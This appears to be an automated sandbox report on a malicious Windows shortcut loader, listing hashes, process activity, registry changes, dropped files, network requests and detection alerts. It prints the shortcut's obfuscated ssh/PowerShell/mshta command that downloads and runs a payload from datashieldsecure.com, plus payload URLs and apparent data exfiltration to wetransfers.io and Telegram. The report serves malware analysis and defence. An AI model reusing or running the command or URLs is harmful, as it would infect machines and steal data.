| File name: | 93b99539a720ff7bc27eaef677d29c9a.lnk |
| Full analysis: | https://app.any.run/tasks/7d1a3c43-88fa-4b6c-802c-f8e4d37e839b |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | February 28, 2025, 07:55:30 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | 93B99539A720FF7BC27EAEF677D29C9A |
| SHA1: | 26F5C529A1D05B0AF5951F9F3D4C26BFFBF512D2 |
| SHA256: | 9AED0EDA60E4E1138BE5D6D8D0280343A3CF6B30D39A704B2D00503261ADBE2A |
| SSDEEP: | 24:8N8PZsx/Tfff//YK/Ur7p+/+GLuWbmBDcxddS9dbEQsfe:87TXvYKK7RGKaBdo9aQ+e |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 7420)
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 8128)
Request from PowerShell that ran from MSHTA.EXE
- powershell.exe (PID: 7420)
Script downloads file (POWERSHELL)
- run.exe (PID: 2692)
Registers / Runs the DLL via REGSVR32.EXE
- run.exe (PID: 2692)
Actions looks like stealing of personal data
- regsvr32.exe (PID: 5400)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- ssh.exe (PID: 7756)
- powershell.exe (PID: 7828)
- mshta.exe (PID: 8128)
Application launched itself
- powershell.exe (PID: 7828)
BASE64 encoded PowerShell command has been detected
- ssh.exe (PID: 7756)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 8128)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 8128)
Executes script without checking the security policy
- powershell.exe (PID: 7420)
Converts a specified value to a byte (POWERSHELL)
- powershell.exe (PID: 7420)
Process requests binary or script from the Internet
- powershell.exe (PID: 7420)
Checks Windows Trust Settings
- run.exe (PID: 2692)
Reads security settings of Internet Explorer
- run.exe (PID: 2692)
Gets or sets the security protocol (POWERSHELL)
- run.exe (PID: 2692)
Checks for external IP
- svchost.exe (PID: 2196)
- regsvr32.exe (PID: 5400)
Executable content was dropped or overwritten
- run.exe (PID: 2692)
- powershell.exe (PID: 7420)
Process communicates with Telegram (possibly using it as an attacker's C2 server)
- regsvr32.exe (PID: 5400)
Potential Corporate Privacy Violation
- powershell.exe (PID: 7420)
INFO
Reads Internet Explorer settings
- mshta.exe (PID: 8128)
Checks proxy server information
- mshta.exe (PID: 8128)
- powershell.exe (PID: 7420)
- run.exe (PID: 2692)
- slui.exe (PID: 7688)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 7420)
Disables trace logs
- powershell.exe (PID: 7420)
- run.exe (PID: 2692)
Application launched itself
- Acrobat.exe (PID: 5332)
- AcroCEF.exe (PID: 7236)
The executable file from the user directory is run by the Powershell process
- run.exe (PID: 2692)
Create files in a temporary directory
- run.exe (PID: 2692)
Checks supported languages
- run.exe (PID: 2692)
Reads the computer name
- run.exe (PID: 2692)
Reads the machine GUID from the registry
- run.exe (PID: 2692)
Creates files in the program directory
- regsvr32.exe (PID: 5400)
Reads the software policy settings
- run.exe (PID: 2692)
- slui.exe (PID: 7688)
Creates files or folders in the user directory
- regsvr32.exe (PID: 5400)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 11 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | ssh.exe |
| RelativePath: | ..\..\..\Windows\System32\OpenSSH\ssh.exe |
| CommandLineArguments: | -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')" . |
| IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
Total processes
145
Monitored processes
23
Malicious processes
5
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2692 | "C:\Users\admin\AppData\Roaming\run.exe" | C:\Users\admin\AppData\Roaming\run.exe | powershell.exe | ||||||||||||
User: admin Company: Zander Tools Integrity Level: MEDIUM Description: PowerShell-Wrapper Exit code: 0 Version: 1.0.1.2 Modules
| |||||||||||||||
| 4652 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1532 --field-trial-handle=1628,i,11646368462908838114,18035545468799196117,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Version: 23.1.20093.0 Modules
| |||||||||||||||
| 5008 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | run.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5332 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\admin\AppData\Roaming\example.pdf" | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | — | powershell.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Version: 23.1.20093.0 Modules
| |||||||||||||||
| 5400 | "C:\WINDOWS\system32\regsvr32.exe" /s /i C:\Users\admin\AppData\Local\Temp\5148990940.ocx | C:\Windows\System32\regsvr32.exe | run.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 4 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5780 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1628,i,11646368462908838114,18035545468799196117,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | AcroCEF.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Version: 23.1.20093.0 Modules
| |||||||||||||||
| 6644 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" --type=renderer /prefetch:1 "C:\Users\admin\AppData\Roaming\example.pdf" | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | — | Acrobat.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe Acrobat Version: 23.1.20093.0 Modules
| |||||||||||||||
| 6652 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2172 --field-trial-handle=1628,i,11646368462908838114,18035545468799196117,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | AcroCEF.exe | ||||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Version: 23.1.20093.0 Modules
| |||||||||||||||
| 7236 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | — | Acrobat.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe AcroCEF Version: 23.1.20093.0 Modules
| |||||||||||||||
Total events
33 845
Read events
33 810
Write events
33
Delete events
2
Modification events
| (PID) Process: | (8128) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (8128) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (8128) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7420) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids |
| Operation: | write | Name: | Acrobat.Document.DC |
Value: | |||
| (PID) Process: | (5332) Acrobat.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934 |
| Operation: | write | Name: | DisplayName |
Value: Adobe Acrobat Reader Protected Mode | |||
| (PID) Process: | (6644) Acrobat.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection |
| Operation: | write | Name: | bLastExitNormal |
Value: 0 | |||
| (PID) Process: | (2692) run.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\run_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (2692) run.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\run_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (2692) run.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\run_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (2692) run.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\run_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
Executable files
2
Suspicious files
133
Text files
19
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 8008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_n5stnwcs.lq5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6644 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6644 | binary | |
MD5:366B140BAFC863B7E366AA1E51604759 | SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E | |||
| 7828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xslofgy3.bxo.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hkmd1hyz.k2i.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8008 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:4CCA64041574E8DF3C5C162522FAC468 | SHA256:614379C26F86CC349B9732E63D00B97D86C5E70CDB22287DCAB9619C84923EB1 | |||
| 7236 | AcroCEF.exe | C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF1150bd.TMP | text | |
MD5:D012E5B4EB91B61F6E8AE2F8EC3C623E | SHA256:1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673 | |||
| 7420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4petf33w.31u.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8128 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\run[1].mp4 | binary | |
MD5:20CD6FF57F2AEFAD32F01E107022D182 | SHA256:DC8D0B4B8C866E811D6108A8C4A9F6CF0ACCDCEBFD79422FE0D31FED6B1F9475 | |||
| 7420 | powershell.exe | C:\Users\admin\AppData\Roaming\run.exe | executable | |
MD5:50788D1B037A2EBCCB3D8A090EB74734 | SHA256:C07C5B62239AC24BC42A983CF9528CFD2DAE91CEE852ECBF06970DFE68D9A6B7 | |||
| 6644 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json | binary | |
MD5:837C1211E392A24D64C670DC10E8DA1B | SHA256:8013AC030684B86D754BBFBAB8A9CEC20CAA4DD9C03022715FF353DC10E14031 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
32
DNS requests
10
Threats
20
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
8128 | mshta.exe | GET | 200 | 172.67.211.62:80 | http://datashieldsecure.com/nikbfgppdkfjsfj/run.mp4 | unknown | — | — | unknown |
7420 | powershell.exe | GET | 200 | 172.67.211.62:80 | http://datashieldsecure.com/nikbfgppdkfjsfj/run.exe | unknown | — | — | unknown |
— | — | OPTIONS | 204 | 34.237.241.83:443 | https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=KY&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64 | unknown | — | — | unknown |
5400 | regsvr32.exe | GET | 200 | 34.160.111.145:80 | http://ifconfig.me/ | unknown | — | — | shared |
— | — | GET | 200 | 104.21.45.80:443 | https://datashieldsecure.com/nikbfgppdkfjsfj/example.pdf | unknown | pdf | 690 Kb | unknown |
— | — | POST | 200 | 104.21.59.228:443 | https://wetransfers.io/uplo.php | unknown | text | 52 b | unknown |
— | — | GET | 200 | 34.237.241.83:443 | https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=KY&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64 | unknown | binary | 187 b | whitelisted |
— | — | GET | 200 | 104.21.59.228:443 | https://wetransfers.io/v.php | unknown | executable | 2.18 Mb | unknown |
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | GET | 200 | 23.35.236.137:443 | https://geo2.adobe.com/ | unknown | text | 48 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
8128 | mshta.exe | 172.67.211.62:80 | datashieldsecure.com | CLOUDFLARENET | US | unknown |
7420 | powershell.exe | 172.67.211.62:443 | datashieldsecure.com | CLOUDFLARENET | US | unknown |
7420 | powershell.exe | 172.67.211.62:80 | datashieldsecure.com | CLOUDFLARENET | US | unknown |
2692 | run.exe | 104.21.59.228:443 | wetransfers.io | CLOUDFLARENET | — | unknown |
6652 | AcroCEF.exe | 23.35.236.137:443 | geo2.adobe.com | AKAMAI-AS | DE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
datashieldsecure.com |
| unknown |
wetransfers.io |
| unknown |
geo2.adobe.com |
| whitelisted |
ifconfig.me |
| shared |
api.telegram.org |
| whitelisted |
p13n.adobe.io |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO Request for PDF via PowerShell |
7420 | powershell.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
7420 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
7420 | powershell.exe | Misc activity | ET INFO Request for EXE via Powershell |
— | — | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
— | — | Misc activity | ET INFO EXE - Served Attached HTTP |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2196 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Lookup Domain (ifconfig .me) |
2196 | svchost.exe | Misc activity | SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram |